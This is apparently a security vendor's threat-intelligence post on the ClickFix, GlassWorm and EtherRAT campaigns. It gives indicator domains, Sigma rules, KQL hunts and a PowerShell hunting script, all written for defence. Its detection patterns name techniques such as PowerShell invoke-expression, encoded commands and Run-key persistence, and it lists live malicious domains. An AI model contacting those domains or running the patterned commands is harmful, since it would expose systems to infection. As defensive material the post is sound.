Back to Intelligence

ClickFix, GlassWorm & EtherRAT: Multi-Vector APT Campaign Analysis — Enterprise Defense Pack

SA
Security Arsenal Team
April 26, 2026
6 min read

Current OTX pulse data indicates a convergence of sophisticated threat campaigns utilizing "Living-Off-The-Land" (LotL) techniques, supply chain compromise, and blockchain-based infrastructure to evade detection.

The primary threats identified are:

  1. ClickFix Campaigns: Social engineering attacks targeting Windows and macOS to deliver Lumma Stealer, Vidar, and Redline Stealer.
  2. GlassWorm: A supply-chain attack targeting developers via compromised repositories, utilizing the Solana blockchain for payload staging.
  3. EtherRAT: A North Korean APT-linked Node.js backdoor using "EtherHiding" to store C2 addresses in Ethereum smart contracts.

Collectively, these actors aim for initial access via deception (ClickFix) or trusted development tools (GlassWorm), with the end goal of credential theft, financial asset compromise, and persistent remote access.

Threat Actor / Malware Profile

Malware / ActorDistributionPayload BehaviorC2 & Persistence
ClickFix ClustersSocial Engineering (Fake Browser errors, Intuit/Booking.com impersonation).Triggers via "repair" instructions; runs PowerShell/Bash to download loaders. Executes info-stealers (Lumma, Vidar).Connects to delivery domains; persistence via scheduled tasks or startup folders. Heavy obfuscation.
GlassWormSupply Chain (Compromised code repos/package managers).Fingerprinting -> Fetches payload from Solana blockchain -> Installs RAT + Stealer. Targets crypto wallets and dev creds.Uses fake browser extensions for surveillance. C2 coordinates obfuscated via blockchain transactions.
EtherRAT (NK APT)Phishing / IT Support Scams.Node.js based backdoor. Gathers sys_info, host fingerprinting, CIS language checks. Arbitrary code execution.EtherHiding: C2 addresses stored in Ethereum smart contract data fields. Uses CDN-like beaconing to blend in with web traffic.

IOC Analysis

The provided indicators of compromise (IOCs) consist primarily of domains and hostnames used for payload delivery and C2 communication.

  • Delivery Domains (ClickFix): Used to host the initial malicious scripts or stealers (e.g., ustazazharidrus.com, account-help.info).
  • C2 / RPC Infrastructure (EtherRAT): Includes domains mimicking infrastructure or specific RPC endpoints (e.g., rpc.payload.de, o-parana.com).

Operational Guidance:

  • Blocklisting: Immediate ingestion of these domains into DNS firewalls and Secure Web Gateways (SWG).
  • Hunting: Use Zeek/Bro logs or DNS analytics to look for recently resolved domains matching the patterns above.
  • Decoding: Tools like CyberChef or VirusTotal can assist in de-obfuscating the PowerShell scripts often associated with the ClickFix initial access vector.

Detection Engineering

Sigma Rules

YAML
---
title: Potential ClickFix Social Engineering Activity
id: 8a4b3c2d-1e0f-4a5b-8c9d-0e1f2a3b4c5d
description: Detects suspicious PowerShell or Bash execution patterns often associated with ClickFix campaigns, specifically commands triggered by user interaction or \"repair\" scripts.
status: experimental
date: 2026/04/26
author: Security Arsenal
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith:
      - '\\powershell.exe'
      - '\\pwsh.exe'
    CommandLine|contains:
      - 'copyitem'
      - 'invoke-expression'
      - 'iex'
  filter_legit:
    ParentImage|contains:
      - '\\explorer.exe'
  condition: selection and not filter_legit
falsepositives:
  - Legitimate system administration scripts
level: high
tags:
  - attack.initial_access
  - attack.execution
  - attack.t1204
---
title: Node.js Process Suspicious Network Connection
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects Node.js processes establishing network connections, characteristic of EtherRAT or GlassWorm backdoors communicating with C2 or blockchains.
status: experimental
date: 2026/04/26
author: Security Arsenal
logsource:
  product: windows
  category: network_connection
detection:
  selection:
    Image|endswith: '\
ode.exe'
    Initiated: 'true'
  filter:
    DestinationPort|contains:
      - '80'
      - '443'
    DestinationHostname|contains:
      - 'node_modules.org'
      - 'npmjs.com'
      - 'github.com'
  condition: selection and not filter
falsepositives:
  - Legitimate Node.js web servers
level: medium
tags:
  - attack.command_and_control
  - attack.c2
  - attack.t1071
---
title: Suspicious Ethereum RPC Interaction via Script
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects scripts or processes attempting to interact with Ethereum Mainnet RPC endpoints, potentially indicative of EtherHiding or GlassWorm payload retrieval.
status: experimental
date: 2026/04/26
author: Security Arsenal
logsource:
  product: windows
  category: network_connection
detection:
  selection:
    DestinationHostname|contains:
      - '.eth'
      - 'rpc.payload.de'
      - 'cloudflare-eth.com'
      - 'mainnet.infura.io'
    DestinationPort: 443
    Image|endswith:
      - '\\powershell.exe'
      - '\\cmd.exe'
      - '\
ode.exe'
      - '\\wscript.exe'
  condition: selection
falsepositives:
  - Legitimate Web3 applications or developer tools
level: high
tags:
  - attack.command_and_control
  - attack.defense_evasion

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix and EtherRAT Network Indicators
let IoC_Domains = dynamic([
    \"ustazazharidrus.com\", \"account-help.info\", \"quiptly.com\", \"elive123go.com\", 
    \"visitbundala.com\", \"nhacaired88.com\", \"subsgod.com\", \"ariciversontile.com\",
    \"o-parana.com\", \"rpc.payload.de\", \"jariosos.com\", \"hayesmed.com\", 
    \"regancontrols.com\", \"salinasrent.com\", \"justtalken.com\", \"mebeliotmasiv.com\"
]);
DeviceNetworkEvents
| where RemoteUrl in (IoC_Domains) or RemoteUrl has_any (IoC_Domains)
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| extend ThreatContext = case(
    RemoteUrl has \"rpc\", \"Potential EtherRAT C2\",
    RemoteUrl has_any (\"ustazazharidrus\", \"account-help\"), \"Potential ClickFix Delivery\",
    \"Suspicious Domain Match\"
)


kql
// Hunt for suspicious Node.js activity (EtherRAT/GlassWorm)
DeviceProcessEvents
| where FileName =~ \"node.exe\"
| where ProcessCommandLine contains \"http\" or ProcessCommandLine contains \"sock\"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessParentFileName
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt for artifacts associated with ClickFix, GlassWorm, and EtherRAT.
.DESCRIPTION
    Checks DNS Cache, recent processes, and suspicious registry keys.
#>

$MaliciousDomains = @(
    \"ustazazharidrus.com\", \"account-help.info\", \"quiptly.com\", \"rpc.payload.de\", \"o-parana.com\"
)

Write-Host \"[*] Checking DNS Cache for malicious domains...\"
$DnsCache = Get-DnsClientCache | Where-Object { $MaliciousDomains -contains $_.Entry }
if ($DnsCache) {
    Write-Host \"[!] ALERT: Found malicious entries in DNS Cache:\" -ForegroundColor Red
    $DnsCache | Format-Table Entry, Data, Type
} else {
    Write-Host \"[-] No malicious DNS cache entries found.\"
}

Write-Host \"[*] Checking for suspicious Node.js processes...\"
$NodeProcesses = Get-WmiObject Win32_Process | Where-Object { $_.Name -eq \"node.exe\" -and $_.CommandLine -match \"http|sock|rpc\" }
if ($NodeProcesses) {
    Write-Host \"[!] ALERT: Suspicious Node.js processes running:\" -ForegroundColor Red
    $NodeProcesses | Select-Object ProcessId, CommandLine
} else {
    Write-Host \"[-] No suspicious Node.js processes found.\"
}

Write-Host \"[*] Checking for Run keys associated with common stealers...\"
$RunKeys = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\", \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -ErrorAction SilentlyContinue
$SuspiciousEntries = $RunKeys.PSObject.Properties | Where-Object { $_.Value -match \"powershell -e|node .*\.js|cmd /c\" }
if ($SuspiciousEntries) {
    Write-Host \"[!] ALERT: Suspicious persistence mechanisms found:\" -ForegroundColor Red
    $SuspiciousEntries | Format-Table Name, Value
} else {
    Write-Host \"[-] No suspicious persistence mechanisms found.\"
}


# Response Priorities

*   **Immediate**:
    *   Block all domains and hostnames listed in the IOC Analysis section at the perimeter firewall and proxy.
    *   Scan all endpoints for the presence of Node.js processes in non-development environments.
    *   Isolate systems with confirmed DNS hits to the ClickFix or EtherRAT IOCs.

*   **24 Hours**:
    *   **Credential Reset**: If Lumma Stealer, Vidar, or Redline activity is suspected, force a password reset for users on infected machines and rotate developer API keys (GlassWorm targets).
    *   **Browser Extension Audit**: Review installed browser extensions on developer machines for unauthorized or fake extensions (GlassWorm).

*   **1 Week**:
    *   **Architecture Hardening**: Implement strict egress filtering for Node.js applications. Block access to public Ethereum/Solana RPC endpoints from non-approved corporate devices to prevent EtherHiding.
    *   **Security Awareness**: Update user training to recognize \"ClickFix\" social engineering tactics (fake browser errors calling for support).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptetherratclickfixglasswormsupply-chainstealer

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action